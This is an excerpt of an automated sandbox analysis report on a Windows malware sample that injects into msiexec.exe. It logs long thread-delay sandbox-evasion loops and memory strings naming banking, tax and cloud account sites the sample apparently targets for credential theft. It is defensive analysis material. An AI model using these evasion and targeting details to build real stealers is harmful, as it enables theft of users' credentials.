            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599875Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599765Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599656Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599547Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599437Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599328Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599206Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599093Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598984Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598736Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598621Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598515Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598406Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598297Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598187Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598078Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597968Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597858Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597750Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597640Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597529Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597422Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597312Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597202Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597093Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596984Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596875Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596765Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596656Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596546Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596435Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596323Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596217Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596082Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595967Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595859Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595750Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595633Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595531Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595422Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595312Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595203Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595093Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594984Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594875Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594765Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594656Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594547Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594437Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6058Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3636Jump to behavior
            Source: C:\Users\user\Desktop\Kb94RzMYNf.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsj9A32.tmp\nsExec.dllJump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8128Thread sleep time: -8301034833169293s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920Thread sleep count: 34 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920Thread sleep time: -31359464925306218s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6660Thread sleep count: 8117 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920Thread sleep time: -599875s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920Thread sleep time: -599765s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 6660Thread sleep count: 1737 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920Thread sleep time: -599656s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920Thread sleep time: -599547s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920Thread sleep time: -599437s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920Thread sleep time: -599328s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920Thread sleep time: -599206s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920Thread sleep time: -599093s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920Thread sleep time: -598984s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920Thread sleep time: -598736s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920Thread sleep time: -598621s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920Thread sleep time: -598515s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920Thread sleep time: -598406s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920Thread sleep time: -598297s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920Thread sleep time: -598187s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920Thread sleep time: -598078s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920Thread sleep time: -597968s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920Thread sleep time: -597858s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920Thread sleep time: -597750s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920Thread sleep time: -597640s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920Thread sleep time: -597529s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920Thread sleep time: -597422s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920Thread sleep time: -597312s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920Thread sleep time: -597202s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920Thread sleep time: -597093s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920Thread sleep time: -596984s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920Thread sleep time: -596875s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920Thread sleep time: -596765s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920Thread sleep time: -596656s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920Thread sleep time: -596546s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920Thread sleep time: -596435s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920Thread sleep time: -596323s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920Thread sleep time: -596217s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920Thread sleep time: -596082s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920Thread sleep time: -595967s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920Thread sleep time: -595859s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920Thread sleep time: -595750s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920Thread sleep time: -595633s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920Thread sleep time: -595531s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920Thread sleep time: -595422s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920Thread sleep time: -595312s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920Thread sleep time: -595203s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920Thread sleep time: -595093s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920Thread sleep time: -594984s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920Thread sleep time: -594875s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920Thread sleep time: -594765s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920Thread sleep time: -594656s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920Thread sleep time: -594547s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 2920Thread sleep time: -594437s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Kb94RzMYNf.exeCode function: 0_2_00405841 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405841
            Source: C:\Users\user\Desktop\Kb94RzMYNf.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
            Source: C:\Users\user\Desktop\Kb94RzMYNf.exeCode function: 0_2_00406393 FindFirstFileW,FindClose,0_2_00406393
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599875Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599765Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599656Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599547Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599437Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599328Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599206Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599093Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598984Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598736Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598621Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598515Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598406Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598297Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598187Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598078Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597968Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597858Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597750Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597640Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597529Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597422Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597312Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597202Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597093Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596984Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596875Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596765Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596656Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596546Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596435Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596323Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596217Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596082Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595967Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595859Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595750Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595633Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595531Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595422Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595312Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595203Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595093Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594984Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594875Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594765Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594656Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594547Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594437Jump to behavior
            Source: msiexec.exe, 00000005.00000002.2601116550.0000000022D3C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
            Source: msiexec.exe, 00000005.00000002.2601116550.0000000022D3C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696501413o
            Source: msiexec.exe, 00000005.00000002.2601116550.0000000022D3C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696501413h
            Source: msiexec.exe, 00000005.00000002.2601116550.0000000022D3C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
            Source: msiexec.exe, 00000005.00000002.2601116550.0000000022D3C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696501413j
            Source: msiexec.exe, 00000005.00000002.2601116550.000000002305B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696501413
            Source: msiexec.exe, 00000005.00000002.2601116550.0000000022D3C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - COM.HKVMware20,11696501413
            Source: msiexec.exe, 00000005.00000002.2601116550.000000002305B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
            Source: msiexec.exe, 00000005.00000002.2582024062.00000000004BA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2564398022.00000000004E9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2564398022.000000000051F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2582024062.000000000051F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: msiexec.exe, 00000005.00000002.2601116550.0000000022D3C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696501413
            Source: msiexec.exe, 00000005.00000002.2601116550.000000002305B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696501413
            Source: ModuleAnalysisCache.2.drBinary or memory string: Get-NetEventVmNetworkAdapter
            Source: msiexec.exe, 00000005.00000002.2601116550.0000000022D3C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
            Source: msiexec.exe, 00000005.00000002.2601116550.0000000022D3C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696501413t
            Source: msiexec.exe, 00000005.00000002.2601116550.0000000022D3C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - HKVMware20,11696501413]
            Source: msiexec.exe, 00000005.00000002.2601116550.000000002305B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - COM.HKVMware20,11696501413
            Source: msiexec.exe, 00000005.00000002.2601116550.000000002305B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - HKVMware20,11696501413]
            Source: msiexec.exe, 00000005.00000002.2601116550.000000002305B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
            Source: msiexec.exe, 00000005.00000002.2601116550.000000002305B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696501413j
            Source: msiexec.exe, 00000005.00000002.2601116550.000000002305B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413x
            Source: msiexec.exe, 00000005.00000002.2601116550.0000000022D3C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696501413
            Source: msiexec.exe, 00000005.00000002.2601116550.0000000022D3C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.comVMware20,11696501413}
            Source: msiexec.exe, 00000005.00000002.2601116550.000000002305B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413}
            Source: msiexec.exe, 00000005.00000002.2601116550.0000000022D3C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696501413x
            Source: msiexec.exe, 00000005.00000002.2601116550.0000000022D3C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696501413t
            Source: msiexec.exe, 00000005.00000002.2601116550.0000000022D3C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactiveuserers.comVMware20,11696501413
            Source: msiexec.exe, 00000005.00000002.2601116550.000000002305B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696501413
            Source: msiexec.exe, 00000005.00000002.2599404721.0000000021DF7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd32ae06876375P
            Source: msiexec.exe, 00000005.00000002.2601116550.0000000022D3C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696501413
            Source: msiexec.exe, 00000005.00000002.2601116550.000000002305B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696501413
            Source: msiexec.exe, 00000005.00000002.2601116550.000000002305B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696501413x
            Source: msiexec.exe, 00000005.00000002.2601116550.000000002305B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696501413s
            Source: msiexec.exe, 00000005.00000002.2601116550.000000002305B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696501413f
            Source: ModuleAnalysisCache.2.drBinary or memory string: Remove-NetEventVmNetworkAdapter
            Source: msiexec.exe, 00000005.00000002.2601116550.0000000022D3C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696501413
            Source: msiexec.exe, 00000005.00000002.2601116550.000000002305B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactiveuserers.comVMware20,11696501413
            Source: msiexec.exe, 00000005.00000002.2601116550.0000000022D3C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
            Source: msiexec.exe, 00000005.00000002.2601116550.000000002305B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
            Source: msiexec.exe, 00000005.00000002.2601116550.0000000022D3C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696501413x
            Source: msiexec.exe, 00000005.00000002.2599404721.0000000021DF7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8dd3282708daf7e<
            Source: msiexec.exe, 00000005.00000002.2601116550.000000002305B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696501413x
            Source: msiexec.exe, 00000005.00000002.2601116550.000000002305B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696501413
            Source: msiexec.exe, 00000005.00000002.2601116550.000000002305B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696501413h
            Source: msiexec.exe, 00000005.00000002.2601116550.0000000022D3C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413}
            Source: msiexec.exe, 00000005.00000002.2601116550.000000002305B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413
            Source: msiexec.exe, 00000005.00000002.2601116550.000000002305B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactiveuserers.co.inVMware20,11696501413d
            Source: msiexec.exe, 00000005.00000002.2601116550.0000000022D3C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413x
            Source: msiexec.exe, 00000005.00000002.2601116550.0000000022D3C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696501413s
            Source: msiexec.exe, 00000005.00000002.2601116550.0000000022D3C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
            Source: msiexec.exe, 00000005.00000002.2601116550.000000002305B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696501413t
            Source: msiexec.exe, 00000005.00000002.2601116550.000000002305B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696501413t
            Source: msiexec.exe, 00000005.00000002.2601116550.000000002305B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU WestVMware20,11696501413n
            Source: msiexec.exe, 00000005.00000002.2601116550.0000000022D3C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696501413u
            Source: msiexec.exe, 00000005.00000002.2601116550.000000002305B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.comVMware20,11696501413}
            Source: msiexec.exe, 00000005.00000002.2601116550.0000000022D3C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
            Source: msiexec.exe, 00000005.00000002.2601116550.0000000022D3C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU WestVMware20,11696501413n
